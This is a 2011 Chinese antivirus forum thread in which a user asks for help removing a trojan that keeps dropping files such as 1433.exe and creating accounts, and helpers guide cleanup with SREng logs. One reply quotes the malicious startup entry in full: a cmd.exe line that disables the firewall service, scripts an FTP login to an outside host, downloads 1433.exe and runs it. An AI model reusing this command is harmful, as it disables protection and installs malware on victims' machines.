系统里的木马会不断重建用户和启动项 bbs.ikaka.com

zxb726 - 2011-4-2 13:31:00

呃，最近电脑中了木马，不断的会在system32的文件夹中重复出现1433.exe qq.exe 1.exe 123.exe诸如此类的文件，在开机启动项里会出现estnod32的那个启动项，间隔几次开机又会创建账户，删除了之后仍旧会这样出现。
现在已经用过瑞星，360的杀毒软件，还有360的急救箱等进入安全模式进行查杀，然后仍旧没有效果。
第一次来这便是求助，实在有些冒昧，不过实在是没有办法了，望达人指点，万分感谢！

ps：不太清楚论坛怎么上传图片，所以只好打包了一些截了的图片上来，不知道有用没....

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Maxthon 2.0)

附件: 新建文件夹 (2).rar

networkedition - 2011-4-2 13:38:00

下载sreng工具，扫描日志压缩发来。
http://www.kztechs.com/sreng/download.html

zxb726 - 2011-4-2 13:48:00

瑞星防护时的病毒名称是beckdoor.win32.genfxj.c
还有win32.parite.aj

附件: SREngLOG.log

networkedition - 2011-4-2 14:04:00

c:\windows\system32\vmprp331.ax 找到压缩发来。
全盘搜索ctfmon.exe找到一并压缩发来。

zxb726 - 2011-4-2 14:28:00

引用:

原帖由 networkedition 于 2011-4-2 14:04:00 发表
c:\windows\system32\vmprp331.ax 找到压缩发来。
全盘搜索ctfmon.exe找到一并压缩发来。

附件: ctfmon1.rar

附件: ctfmon2.rar

附件: ctfmon3.rar

zxb726 - 2011-4-2 14:29:00

引用:

原帖由 networkedition 于 2011-4-2 14:04:00 发表
c:\windows\system32\vmprp331.ax 找到压缩发来。
全盘搜索ctfmon.exe找到一并压缩发来。

附件: vmprp331.rar

附件: ctfmon(搜索截图，最后一个无法读取）.rar

zxb726 - 2011-4-2 14:30:00

呃。。。待会要上课了，所以还需要上传什么文件，要等到晚上了。。。

networkedition - 2011-4-2 14:41:00

使用sreng工具修复一下启动项，<shell><c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open zi838.gicp.net > cmd.txt&echo cmusic>> cmd.txt&echo hjkasd1002>> cmd.txt&echo binary >> cmd.txt&echo get 1433.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1433.exe&1433.exe&> [(Verified)Microsoft Windows]，修复完成后重启电脑再使用杀毒软件进行全盘杀毒。

夲號ヱ被ジ盜 - 2011-4-2 17:31:00

第一第二个ctfmon不是病毒

第三个是windows7里面的ctfmon.exe
XP下无法运行

zxb726 - 2011-4-2 21:24:00

目前看来，问题已经解决了，如果还有问题的话我再来这个帖子好了
非常感谢！

瑞星卡卡安全论坛